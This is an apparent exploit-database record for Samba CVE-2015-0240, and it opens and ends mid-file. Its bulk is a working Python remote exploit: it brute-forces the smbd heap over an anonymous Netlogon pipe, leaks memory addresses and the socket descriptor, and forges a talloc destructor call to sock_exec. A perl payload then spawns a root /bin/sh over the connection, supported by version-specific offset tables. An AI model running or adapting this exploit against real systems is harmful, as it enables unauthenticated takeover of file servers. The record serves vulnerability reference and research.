cannot call\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n fake_talloc_chunk_exec = pack(\"<IIIIIIIIIIII\",\r\n 0, 0, # next, prev\r\n 0, 0, # parent, child\r\n 0, # refs\r\n info['sock_exec_addr'], # destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n chunk = '\\x00'*prefix_len+fake_talloc_chunk_exec + info['cmd'] + '\\x00'\r\n set_payload(chunk, TARGET_PAYLOAD_SIZE)\r\n for i in range(3):\r\n if request_check_valid_addr(info['payload_addr']+TALLOC_HDR_SIZE+prefix_len):\r\n print('waiting for shell :)')\r\n return True\r\n print('something wrong :(')\r\n return False\r\n \r\n########\r\n# start work\r\n########\r\n \r\ndef check_exploitable():\r\n if request_check_valid_addr(0x41414141):\r\n print('[-] seems not vulnerable')\r\n return False\r\n if request_check_valid_addr(0):\r\n print('[+] seems exploitable :)')\r\n return True\r\n \r\n print(\"[-] seems vulnerable but I cannot exploit\")\r\n print(\"[-] I can exploit only if 'creds' is controlled by 'ReferentId'\")\r\n return False\r\n \r\ndef do_work(args):\r\n info = {}\r\n \r\n if not (args.payload_addr or args.heap_start or args.start_payload_size):\r\n if not check_exploitable():\r\n return\r\n \r\n start_size = 512*1024 # default size with 512KB\r\n if args.payload_addr:\r\n info['payload_addr'] = args.payload_addr\r\n else:\r\n heap_start = args.heap_start if args.heap_start else 0xb9800000+0x30000\r\n if args.start_payload_size:\r\n start_size = args.start_payload_size * 1024\r\n if start_size < TARGET_PAYLOAD_SIZE:\r\n start_size = 512*1024 # back to default\r\n info['payload_addr'] = find_payload_addr(heap_start, start_size, TARGET_PAYLOAD_SIZE)\r\n \r\n # the real talloc chunk address that stored the raw netlogon data\r\n # serverHandle 0x10 bytes. accountName 0xc bytes\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n \r\n while not leak_info_find_offset(info):\r\n # Note: do heap bruteforcing again seems to be more effective\r\n # start from payload_addr + some offset\r\n print(\"[+] bruteforcing heap again. start from {:x}\".format(info['payload_addr']+0x10000))\r\n info['payload_addr'] = find_payload_addr(info['payload_addr']+0x10000, start_size, TARGET_PAYLOAD_SIZE)\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n \r\n got_fd = leak_sock_fd(info)\r\n \r\n # create shell command for reuse sock fd\r\n cmd = \"perl -e 'use POSIX qw(dup2);$)=0;$>=0;\" # seteuid, setegid\r\n cmd += \"dup2({0:d},0);dup2({0:d},1);dup2({0:d},2);\".format(info['sock_fd']) # dup sock\r\n # have to kill grand-grand-parent process because sock_exec() does fork() then system()\r\n # the smbd process still receiving data from socket\r\n cmd += \"$z=getppid;$y=`ps -o ppid= $z`;$x=`ps -o ppid= $y`;kill 15,$x,$y,$z;\" # kill parents\r\n cmd += \"\"\"print \"shell ready\\n\";exec \"/bin/sh\";'\"\"\" # spawn shell\r\n info['cmd'] = cmd\r\n \r\n # Note: cannot use [email\u00a0protected] because binary is PIE and chunk dtor is called in libtalloc.\r\n # the ebx is not correct for resolving the system address\r\n smbd_info = {\r\n 0x5dd: { 'uint8t_offset': 0x711555, 'talloc_pop': 0x41a890, 'sock_exec': 0x0044a060, 'version': '3.6.3-2ubuntu2 - 3.6.3-2ubuntu2.3'},\r\n 0xb7d: { 'uint8t_offset': 0x711b7d, 'talloc_pop': 0x41ab80, 'sock_exec': 0x0044a380, 'version': '3.6.3-2ubuntu2.9'},\r\n 0xf7d: { 'uint8t_offset': 0x710f7d, 'talloc_pop': 0x419f80, 'sock_exec': 0x00449770, 'version': '3.6.3-2ubuntu2.11'},\r\n 0xf1d: { 'uint8t_offset': 0x71ff1d, 'talloc_pop': 0x429e80, 'sock_exec': 0x004614b0, 'version': '3.6.6-6+deb7u4'},\r\n }\r\n \r\n leak_talloc_pop_addr(info) # to double check the bininfo\r\n bininfo = smbd_info.get(info['uint8t_addr'] & 0xfff)\r\n if bininfo is not None:\r\n smbd_addr = info['uint8t_addr'] - bininfo['uint8t_offset']\r\n if smbd_addr + bininfo['talloc_pop'] == info['talloc_pop_addr']:\r\n # correct info\r\n print('[+] detect smbd version: {:s}'.format(bininfo['version']))\r\n info['smbd_addr'] = smbd_addr\r\n info['sock_exec_addr'] = smbd_addr + bininfo['sock_exec']\r\n print(' [*] smbd loaded addr: {:x}'.format(smbd_addr))\r\n print(' [*] use sock_exec offset: {:x}'.format(bininfo['sock_exec']))\r\n print(' [*] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n else:\r\n # wrong info\r\n bininfo = None\r\n \r\n got_shell = False\r\n if bininfo is None:\r\n # no target binary info. do a hard way to find them.\r\n \"\"\"\r\n leak smbd_server_connection_handler for 2 purposes\r\n - to check if compiler does code alignment\r\n - to estimate smbd loaded address\r\n - gcc always puts smbd_server_connection_handler() function at\r\n beginning area of .text section\r\n - so the difference of smbd_server_connection_handler() offset is\r\n very low for all smbd binary (compiled by gcc)\r\n \"\"\" \r\n leak_smbd_server_connection_handler_addr(info)\r\n find_smbd_base_addr(info)\r\n dump_smbd_find_bininfo(info)\r\n \r\n # code execution\r\n if 'sock_exec_addr' in info and call_sock_exec(info):\r\n s = get_socket()\r\n print(s.recv(4096)) # wait for 'shell ready' message\r\n s.send('uname -a\\n')\r\n print(s.recv(4096))\r\n s.send('id\\n')\r\n print(s.recv(4096))\r\n s.send('exit\\n')\r\n s.close()\r\n \r\n \r\ndef hex_int(x):\r\n return int(x,16)\r\n \r\n# command arguments\r\nparser = argparse.ArgumentParser(description='Samba CVE-2015-0240 exploit')\r\nparser.add_argument('target', help='target IP address')\r\nparser.add_argument('-hs', '--heap_start', type=hex_int,\r\n help='heap address in hex to start bruteforcing')\r\nparser.add_argument('-pa', '--payload_addr', type=hex_int,\r\n help='exact payload (accountName) address in heap. If this is defined, no heap bruteforcing')\r\nparser.add_argument('-sps', '--start_payload_size', type=int,\r\n help='start payload size for bruteforcing heap address in KB. (128, 256, 512, ...)')\r\n \r\nargs = parser.parse_args()\r\nrequester.set_target(args.target)\r\n \r\n \r\ntry:\r\n do_work(args)\r\nexcept KeyboardInterrupt:\r\n pass\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23513"}], "exploitdb": [{"lastseen": "2016-02-04T04:14:01", "bulletinFamily": "exploit", "description": "Samba < 3.6.2 x86 - PoC. CVE-2015-0240. Dos exploit for linux platform", "modified": "2015-04-13T00:00:00", "published": "2015-04-13T00:00:00", "id": "EDB-ID:36741", "href": "https://www.exploit-db.com/exploits/36741/", "type": "exploitdb", "title": "Samba < 3.6.2 x86 - PoC", "sourceData": "#!/usr/bin/python\r\n\"\"\"\r\nExploit for Samba vulnerabilty (CVE-2015-0240) by sleepya\r\n\r\nThe exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by \r\nReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'\r\nin libtalloc does not write a value on 'creds' address.\r\n\r\nReference:\r\n- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/\r\n\r\nNote:\r\n- heap might be changed while running exploit, need to try again (with '-hs' or '-pa' option)\r\n if something failed\r\n\r\nFind heap address:\r\n- ubuntu PIE heap start range: b7700000 - b9800000\r\n- start payload size: the bigger it is the lesser connection and binding time.\r\n but need more time to shrink payload size\r\n- payload is too big to fit in freed small hole. so payload is always at end\r\n of heap\r\n- start bruteforcing heap address from high memory address to low memory address\r\n to prevent 'creds' pointed to real heap chunk (also no crash but not our payload)\r\n\r\nLeak info:\r\n- heap layout is predictable because talloc_stackframe_pool(8192) is called after \r\n accepted connection and fork but before calling smbd_server_connection_loop_once()\r\n- before talloc_stackframe_pool(8192) is called, there are many holes in heap\r\n but their size are <8K. so pool is at the end of heap at this time\r\n- many data that allocated after talloc_stackframe_pool(8192) are allocated in pool.\r\n with the same pattern of request, the layout in pool are always the same.\r\n- many data are not allocated in pool but fit in free holes. so no small size data are\r\n allocated after pool.\r\n- normally there are only few data block allocated after pool.\r\n - pool size: 0x2048 (included glibc heap header 4 bytes)\r\n - a table that created in giconv_open(). the size is 0x7f88 (included glibc heap header 4 bytes)\r\n - p->in_data.pdu.data. the size is 0x10e8 (included glibc heap header 4 bytes)\r\n - this might not be allocated here because its size might fit in freed hole\r\n - all fragment should be same size to prevent talloc_realloc() changed pdu.data size\r\n - so last fragment should be padded\r\n - ndr DATA_BLOB. the size is 0x10d0 (included glibc heap header 4 bytes)\r\n - this might not be allocated here because its size might fit in freed hole\r\n - p->in_data.data.data. the size is our netlogon data\r\n - for 8K payload, the size is 0x2168 (included glibc heap header 4 bytes)\r\n - this data is allocated by realloc(), grew by each fragment. so this memory\r\n block is not allocated by mmapped even the size is very big.\r\n- pool layout for interested data\r\n - r->out offset from pool (talloc header) is 0x13c0\r\n - r->out.return_authenticator offset from pool is 0x13c0+0x18\r\n - overwrite this (with link unlink) to leak info in ServerPasswordSet response\r\n - smb_request offset from pool (talloc header) is 0x11a0\r\n - smb_request.sconn offset from pool is 0x11a0+0x3c\r\n - socket fd is at smb_request.sconn address (first struct member)\r\n- more shared folder in configuration, more freed heap holes\r\n - only if there is no or one shared, many data might be unexpected allocated after pool.\r\n have to get that extra offset or bruteforce it\r\n\r\n\r\nMore exploitation detail in code (comment) ;)\r\n\"\"\"\r\n\r\nimport sys\r\nimport time\r\nfrom struct import pack,unpack\r\nimport argparse\r\n\r\nimport impacket\r\nfrom impacket.dcerpc.v5 import transport, nrpc\r\nfrom impacket.dcerpc.v5.ndr import NDRCALL\r\nfrom impacket.dcerpc.v5.dtypes import WSTR\r\n\r\n\r\nclass Requester:\r\n \"\"\"\r\n put all smb request stuff into class. help my editor folding them\r\n \"\"\"\r\n \r\n # impacket does not implement NetrServerPasswordSet\r\n # 3.5.4.4.6 NetrServerPasswordSet (Opnum 6)\r\n class NetrServerPasswordSet(NDRCALL):\r\n opnum = 6\r\n structure = (\r\n ('PrimaryName',nrpc.PLOGONSRV_HANDLE),\r\n ('AccountName',WSTR),\r\n ('SecureChannelType',nrpc.NETLOGON_SECURE_CHANNEL_TYPE),\r\n ('ComputerName',WSTR),\r\n ('Authenticator',nrpc.NETLOGON_AUTHENTICATOR),\r\n ('UasNewPassword',nrpc.ENCRYPTED_NT_OWF_PASSWORD),\r\n )\r\n # response is authenticator (8 bytes) and error code (4 bytes)\r\n\r\n # size of each field in sent packet\r\n req_server_handle_size = 16\r\n req_username_hdr_size = 4 + 4 + 4 + 2 # max count, offset, actual count, trailing null\r\n req_sec_type_size = 2\r\n req_computer_size = 4 + 4 + 4 + 2\r\n req_authenticator_size = 8 + 2 + 4\r\n req_new_pwd_size = 16\r\n req_presize = req_server_handle_size + req_username_hdr_size + req_sec_type_size + req_computer_size + req_authenticator_size + req_new_pwd_size\r\n \r\n samba_rpc_fragment_size = 4280\r\n netlogon_data_fragment_size = samba_rpc_fragment_size - 8 - 24 # 24 is dcerpc header size\r\n \r\n def __init__(self):\r\n self.target = None\r\n self.dce = None\r\n \r\n sessionKey = '\\x00'*16\r\n # prepare ServerPasswordSet request\r\n authenticator = nrpc.NETLOGON_AUTHENTICATOR()\r\n authenticator['Credential'] = nrpc.ComputeNetlogonCredential('12345678', sessionKey)\r\n authenticator['Timestamp'] = 10\r\n\r\n uasNewPass = nrpc.ENCRYPTED_NT_OWF_PASSWORD()\r\n uasNewPass['Data'] = '\\x00'*16\r\n\r\n self.serverName = nrpc.PLOGONSRV_HANDLE()\r\n # ReferentID field of PrimaryName controls the uninitialized value of creds\r\n self.serverName.fields['ReferentID'] = 0\r\n \r\n self.accountName = WSTR()\r\n\r\n request = Requester.NetrServerPasswordSet()\r\n request['PrimaryName'] = self.serverName\r\n request['AccountName'] = self.accountName\r\n request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel\r\n request['ComputerName'] = '\\x00'\r\n request['Authenticator'] = authenticator\r\n request['UasNewPassword'] = uasNewPass\r\n self.request = request\r\n \r\n def set_target(self, target):\r\n self.target = target\r\n \r\n def set_payload(self, s, pad_to_size=0):\r\n if pad_to_size > 0:\r\n s += '\\x00'*(pad_to_size-len(s))\r\n pad_size = 0\r\n if len(s) < (16*1024+1):\r\n ofsize = (len(s)+self.req_presize) % self.netlogon_data_fragment_size\r\n if ofsize > 0:\r\n pad_size = self.netlogon_data_fragment_size - ofsize\r\n \r\n self.accountName.fields['Data'] = s+'\\x00'*pad_size+'\\x00\\x00'\r\n self.accountName.fields['MaximumCount'] = None\r\n self.accountName.fields['ActualCount'] = None\r\n self.accountName.data = None # force recompute\r\n \r\n set_accountNameData = set_payload\r\n\r\n def get_dce(self):\r\n if self.dce is None or self.dce.lostconn:\r\n rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:%s[\\PIPE\\netlogon]' % self.target)\r\n rpctransport.set_credentials('','') # NULL session\r\n rpctransport.set_dport(445)\r\n # force to 'NT LM 0.12' only\r\n rpctransport.preferred_dialect('NT LM 0.12')\r\n \r\n self.dce = rpctransport.get_dce_rpc()\r\n self.dce.connect()\r\n self.dce.bind(nrpc.MSRPC_UUID_NRPC)\r\n self.dce.lostconn = False\r\n return self.dce\r\n\r\n def get_socket(self):\r\n return self.dce.get_rpc_transport().get_socket()\r\n \r\n def force_dce_disconnect(self):\r\n if not (self.dce is None or self.dce.lostconn):\r\n self.get_socket().close()\r\n self.dce.lostconn = True\r\n\r\n def request_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n answer = dce.recv()\r\n return unpack(\"<IIII\", answer)\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return None\r\n\r\n # call with no read\r\n def call_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n return True\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return False\r\n \r\n def force_recv(self):\r\n dce = self.get_dce()\r\n return dce.get_rpc_transport().recv(forceRecv=True)\r\n\r\n def request_check_valid_addr(self, addr):\r\n answers = self.request_addr(addr)\r\n if answers is None:\r\n return False # connection lost\r\n elif answers[3] != 0:\r\n return True # error, expected\r\n else:\r\n raise Error('Unexpected result')\r\n\r\n\r\n# talloc constants\r\nTALLOC_MAGIC = 0xe8150c70 # for talloc 2.0\r\nTALLOC_FLAG_FREE = 0x01\r\nTALLOC_FLAG_LOOP = 0x02\r\nTALLOC_FLAG_POOL = 0x04\r\nTALLOC_FLAG_POOLMEM = 0x08\r\n\r\nTALLOC_HDR_SIZE = 0x30 # for 32 bit\r\n\r\nflag_loop = TALLOC_MAGIC | TALLOC_FLAG_LOOP # for checking valid address\r\n\r\n# Note: do NOT reduce target_payload_size less than 8KB. 4KB is too small buffer. cannot predict address.\r\nTARGET_PAYLOAD_SIZE = 8192\r\n\r\n########\r\n# request helper functions\r\n########\r\n\r\n# only one global requester\r\nrequester = Requester()\r\n\r\ndef force_dce_disconnect():\r\n requester.force_dce_disconnect()\r\n\r\ndef request_addr(addr):\r\n return requester.request_addr(addr)\r\n\r\ndef request_check_valid_addr(addr):\r\n return requester.request_check_valid_addr(addr)\r\n\r\ndef set_payload(s, pad_to_size=0):\r\n requester.set_payload(s, pad_to_size)\r\n\r\ndef get_socket():\r\n return requester.get_socket()\r\n \r\ndef call_addr(addr):\r\n return requester.call_addr(addr)\r\n\r\ndef force_recv():\r\n return requester.force_recv()\r\n \r\n########\r\n# find heap address\r\n########\r\n\r\n# only refs MUST be NULL, other never be checked\r\nfake_chunk_find_heap = pack(\"<IIIIIIII\",\r\n 0, 0, 0, 0, # refs\r\n flag_loop, flag_loop, flag_loop, flag_loop,\r\n)\r\n\r\ndef find_valid_heap_addr(start_addr, stop_addr, payload_size, first=False):\r\n \"\"\"\r\n below code can be used for checking valid heap address (no crash)\r\n\r\n if (unlikely(tc->flags & TALLOC_FLAG_LOOP)) {\r\n /* we have a free loop - stop looping */\r\n return 0;\r\n }\r\n \"\"\"\r\n global fake_chunk_find_heap\r\n payload = fake_chunk_find_heap*(payload_size/len(fake_chunk_find_heap))\r\n set_payload(payload)\r\n addr_step = payload_size\r\n addr = start_addr\r\n i = 0\r\n while addr > stop_addr:\r\n if i == 16:\r\n print(\" [*]trying addr: {:x}\".format(addr))\r\n i = 0\r\n \r\n if request_check_valid_addr(addr):\r\n return addr\r\n if first:\r\n # first time, the last 16 bit is still do not know\r\n # have to do extra check\r\n if request_check_valid_addr(addr+0x10):\r\n return addr+0x10\r\n addr -= addr_step\r\n i += 1\r\n return None\r\n\r\ndef find_valid_heap_exact_addr(addr, payload_size):\r\n global fake_chunk_find_heap\r\n fake_size = payload_size // 2\r\n while fake_size >= len(fake_chunk_find_heap):\r\n payload = fake_chunk_find_heap*(fake_size/len(fake_chunk_find_heap))\r\n set_payload(payload, payload_size)\r\n if not request_check_valid_addr(addr):\r\n addr -= fake_size\r\n fake_size = fake_size // 2\r\n \r\n set_payload('\\x00'*16 + pack(\"<I\", flag_loop), payload_size)\r\n # because glibc heap is align by 8\r\n # so the last 4 bit of address must be 0x4 or 0xc\r\n if request_check_valid_addr(addr-4):\r\n addr -= 4\r\n elif request_check_valid_addr(addr-0xc):\r\n addr -= 0xc\r\n else:\r\n print(\" [-] bad exact addr: {:x}\".format(addr))\r\n return 0\r\n \r\n print(\" [*] checking exact addr: {:x}\".format(addr))\r\n \r\n if (addr & 4) == 0:\r\n return 0\r\n \r\n # test the address\r\n \r\n # must be invalid (refs is AccountName.ActualCount)\r\n set_payload('\\x00'*12 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-4):\r\n print(' [-] request_check_valid_addr(addr-4) failed')\r\n return 0\r\n # must be valid (refs is AccountName.Offset)\r\n # do check again if fail. sometimes heap layout is changed\r\n set_payload('\\x00'*8 + pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-8) and not request_check_valid_addr(addr-8) :\r\n print(' [-] request_check_valid_addr(addr-8) failed')\r\n return 0\r\n # must be invalid (refs is AccountName.MaxCount)\r\n set_payload('\\x00'*4 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-0xc):\r\n print(' [-] request_check_valid_addr(addr-0xc) failed')\r\n return 0\r\n # must be valid (refs is ServerHandle.ActualCount)\r\n # do check again if fail. sometimes heap layout is changed\r\n set_payload(pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-0x10) and not request_check_valid_addr(addr-0x10):\r\n print(' [-] request_check_valid_addr(addr-0x10) failed')\r\n return 0\r\n \r\n return addr\r\n\r\ndef find_payload_addr(start_addr, start_payload_size, target_payload_size):\r\n print('[*] bruteforcing heap address...')\r\n\r\n start_addr = start_addr & 0xffff0000\r\n \r\n heap_addr = 0\r\n while heap_addr == 0:\r\n # loop from max to 0xb7700000 for finding heap area\r\n # offset 0x20000 is minimum offset from heap start to recieved data in heap\r\n stop_addr = 0xb7700000 + 0x20000\r\n good_addr = None\r\n payload_size = start_payload_size\r\n while payload_size >= target_payload_size:\r\n force_dce_disconnect()\r\n found_addr = None\r\n for i in range(3):\r\n found_addr = find_valid_heap_addr(start_addr, stop_addr, payload_size, good_addr is None)\r\n if found_addr is not None:\r\n break\r\n if found_addr is None:\r\n # failed\r\n good_addr = None\r\n break\r\n good_addr = found_addr\r\n print(\" [*] found valid addr ({:d}KB): {:x}\".format(payload_size//1024, good_addr))\r\n start_addr = good_addr\r\n stop_addr = good_addr - payload_size + 0x20\r\n payload_size //= 2\r\n\r\n if good_addr is not None:\r\n # try 3 times to find exact address. if address cannot be found, assume\r\n # minimizing payload size is not correct. start minimizing again\r\n for i in range(3):\r\n heap_addr = find_valid_heap_exact_addr(good_addr, target_payload_size)\r\n if heap_addr != 0:\r\n break\r\n force_dce_disconnect()\r\n \r\n if heap_addr == 0:\r\n print(' [-] failed to find payload adress')\r\n # start from last good address + some offset\r\n start_addr = (good_addr + 0x10000) & 0xffff0000\r\n print('[*] bruteforcing heap adress again from {:x}'.format(start_addr))\r\n \r\n payload_addr = heap_addr - len(fake_chunk_find_heap)\r\n print(\" [+] found payload addr: {:x}\".format(payload_addr))\r\n return payload_addr\r\n\r\n\r\n########\r\n# leak info\r\n########\r\n\r\ndef addr2utf_prefix(addr):\r\n def is_badchar(v):\r\n return (v >= 0xd8) and (v <= 0xdf)\r\n \r\n prefix = 0 # safe\r\n if is_badchar((addr)&0xff) or is_badchar((addr>>16)&0xff):\r\n prefix |= 2 # cannot have prefix\r\n if is_badchar((addr>>8)&0xff) or is_badchar((addr>>24)&0xff):\r\n prefix |= 1 # must have prefix\r\n return prefix\r\n \r\ndef leak_info_unlink(payload_addr, next_addr, prev_addr, retry=True, call_only=False):\r\n \"\"\"\r\n Note:\r\n - if next_addr and prev_addr are not zero, they must be writable address\r\n because of below code in _talloc_free_internal()\r\n if (tc->prev) tc->prev->next = tc->next;\r\n if (tc->next) tc->next->prev = tc->prev;\r\n \"\"\"\r\n # Note: U+D800 to U+DFFF is reserved (also bad char for samba)\r\n # check if '\\x00' is needed to avoid utf16 badchar\r\n prefix_len = addr2utf_prefix(next_addr) | addr2utf_prefix(prev_addr)\r\n if prefix_len == 3:\r\n return None # cannot avoid badchar\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n\r\n fake_chunk_leak_info = pack(\"<IIIIIIIIIIII\",\r\n next_addr, prev_addr, # next, prev\r\n 0, 0, # parent, children\r\n 0, 0, # refs, destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n payload = '\\x00'*prefix_len+fake_chunk_leak_info + pack(\"<I\", 0x80000) # pool_object_count\r\n set_payload(payload, TARGET_PAYLOAD_SIZE)\r\n if call_only:\r\n return call_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n \r\n for i in range(3 if retry else 1):\r\n try:\r\n answers = request_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n except impacket.dcerpc.v5.rpcrt.Exception:\r\n print(\"impacket.dcerpc.v5.rpcrt.Exception\")\r\n answers = None\r\n force_dce_disconnect()\r\n if answers is not None:\r\n # leak info must have next or prev address\r\n if (answers[1] == prev_addr) or (answers[0] == next_addr):\r\n break\r\n #print('{:x}, {:x}, {:x}, {:x}'.format(answers[0], answers[1], answers[2], answers[3]))\r\n answers = None # no next or prev in answers => wrong answer\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n \r\n return answers\r\n \r\ndef leak_info_addr(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: because leak_addr[4:8] will be replaced with r_out_addr\r\n # only answers[0] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, leak_addr, r_out_addr, retry)\r\n\r\ndef leak_info_addr2(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: leak_addr[0:4] will be replaced with r_out_addr\r\n # only answers[1] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, r_out_addr-4, leak_addr-4, retry)\r\n\r\ndef leak_uint8t_addr(payload_addr, r_out_addr, chunk_addr):\r\n # leak name field ('uint8_t') in found heap chunk\r\n # do not retry this leak, because r_out_addr is guessed\r\n answers = leak_info_addr(payload_addr, r_out_addr, chunk_addr + 0x18, False)\r\n if answers is None:\r\n return None\r\n if answers[2] != TALLOC_MAGIC:\r\n force_dce_disconnect()\r\n return None\r\n\r\n return answers[0]\r\n\r\ndef leak_info_find_offset(info):\r\n # offset from pool to payload still does not know\r\n print(\"[*] guessing 'r' offset and leaking 'uint8_t' address ...\")\r\n chunk_addr = info['chunk_addr']\r\n uint8t_addr = None\r\n r_addr = None\r\n r_out_addr = None\r\n while uint8t_addr is None:\r\n # 0x8c10 <= 4 + 0x7f88 + 0x2044 - 0x13c0\r\n # 0x9ce0 <= 4 + 0x7f88 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xadc8 <= 4 + 0x7f88 + 0x10e8 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xad40 is extra offset when no share on debian\r\n # 0x10d38 is extra offset when only [printers] is shared on debian\r\n for offset in (0x8c10, 0x9ce0, 0xadc8, 0xad40, 0x10d38):\r\n r_addr = chunk_addr - offset\r\n # 0x18 is out.authenticator offset\r\n r_out_addr = r_addr + 0x18\r\n print(\" [*] try 'r' offset 0x{:x}, r_out addr: 0x{:x}\".format(offset, r_out_addr))\r\n \r\n uint8t_addr = leak_uint8t_addr(info['payload_addr'], r_out_addr, chunk_addr)\r\n if uint8t_addr is not None:\r\n print(\" [*] success\")\r\n break\r\n print(\" [-] failed\")\r\n if uint8t_addr is None:\r\n return False\r\n \r\n info['uint8t_addr'] = uint8t_addr\r\n info['r_addr'] = r_addr\r\n info['r_out_addr'] = r_out_addr\r\n info['pool_addr'] = r_addr - 0x13c0\r\n \r\n print(\" [+] text 'uint8_t' addr: {:x}\".format(info['uint8t_addr']))\r\n print(\" [+] pool addr: {:x}\".format(info['pool_addr']))\r\n \r\n return True\r\n \r\ndef leak_sock_fd(info):\r\n # leak sock fd from\r\n # smb_request->sconn->sock\r\n # (offset: ->0x3c ->0x0 )\r\n print(\"[*] leaking socket fd ...\")\r\n info['smb_request_addr'] = info['pool_addr']+0x11a0\r\n print(\" [*] smb request addr: {:x}\".format(info['smb_request_addr']))\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr']+0x3c-4)\r\n if answers is None:\r\n print(' [-] cannot leak sconn_addr address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n sconn_addr = answers[2]\r\n info['sconn_addr'] = sconn_addr\r\n print(' [+] sconn addr: {:x}'.format(sconn_addr))\r\n \r\n # write in padding of chunk, no need to disconnect\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], sconn_addr)\r\n if answers is None:\r\n print('cannot leak sock_fd address :(')\r\n return None\r\n sock_fd = answers[1]\r\n print(' [+] sock fd: {:d}'.format(sock_fd))\r\n info['sock_fd'] = sock_fd\r\n return sock_fd\r\n\r\ndef leak_talloc_pop_addr(info):\r\n # leak destructor talloc_pop() address\r\n # overwrite name field, no need to disconnect\r\n print('[*] leaking talloc_pop address')\r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], info['pool_addr'] + 0x14)\r\n if answers is None:\r\n print(' [-] cannot leak talloc_pop() address :(')\r\n return None\r\n if answers[2] != 0x2010: # chunk size must be 0x2010\r\n print(' [-] cannot leak talloc_pop() address. answers[2] is wrong :(')\r\n return None\r\n talloc_pop_addr = answers[0]\r\n print(' [+] talloc_pop addr: {:x}'.format(talloc_pop_addr))\r\n info['talloc_pop_addr'] = talloc_pop_addr\r\n return talloc_pop_addr\r\n\r\ndef leak_smbd_server_connection_handler_addr(info):\r\n # leak address from\r\n # smbd_server_connection.smb1->fde ->handler\r\n # (offset: ->0x9c->0x14 )\r\n # MUST NOT disconnect after getting smb1_fd_event address\r\n print('[*] leaking smbd_server_connection_handler address')\r\n def real_leak_conn_handler_addr(info):\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['sconn_addr'] + 0x9c)\r\n if answers is None:\r\n print(' [-] cannot leak smb1_fd_event address :(')\r\n return None\r\n smb1_fd_event_addr = answers[1]\r\n print(' [*] smb1_fd_event addr: {:x}'.format(smb1_fd_event_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], smb1_fd_event_addr+0x14)\r\n if answers is None:\r\n print(' [-] cannot leak smbd_server_connection_handler address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n smbd_server_connection_handler_addr = answers[0]\r\n diff = info['talloc_pop_addr'] - smbd_server_connection_handler_addr\r\n if diff > 0x2000000 or diff < 0:\r\n print(' [-] get wrong smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n smbd_server_connection_handler_addr = None\r\n return smbd_server_connection_handler_addr\r\n \r\n smbd_server_connection_handler_addr = None\r\n while smbd_server_connection_handler_addr is None:\r\n smbd_server_connection_handler_addr = real_leak_conn_handler_addr(info)\r\n \r\n print(' [+] smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n info['smbd_server_connection_handler_addr'] = smbd_server_connection_handler_addr\r\n \r\n return smbd_server_connection_handler_addr\r\n\r\ndef find_smbd_base_addr(info):\r\n # estimate smbd_addr from talloc_pop\r\n if (info['talloc_pop_addr'] & 0xf) != 0 or (info['smbd_server_connection_handler_addr'] & 0xf) != 0:\r\n # code has no alignment\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x124000\r\n else:\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x130000\r\n start_addr = start_addr & 0xfffff000\r\n stop_addr = start_addr - 0x20000\r\n \r\n print('[*] finding smbd loaded addr ...')\r\n while True:\r\n smbd_addr = start_addr\r\n while smbd_addr >= stop_addr:\r\n if addr2utf_prefix(smbd_addr-8) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n 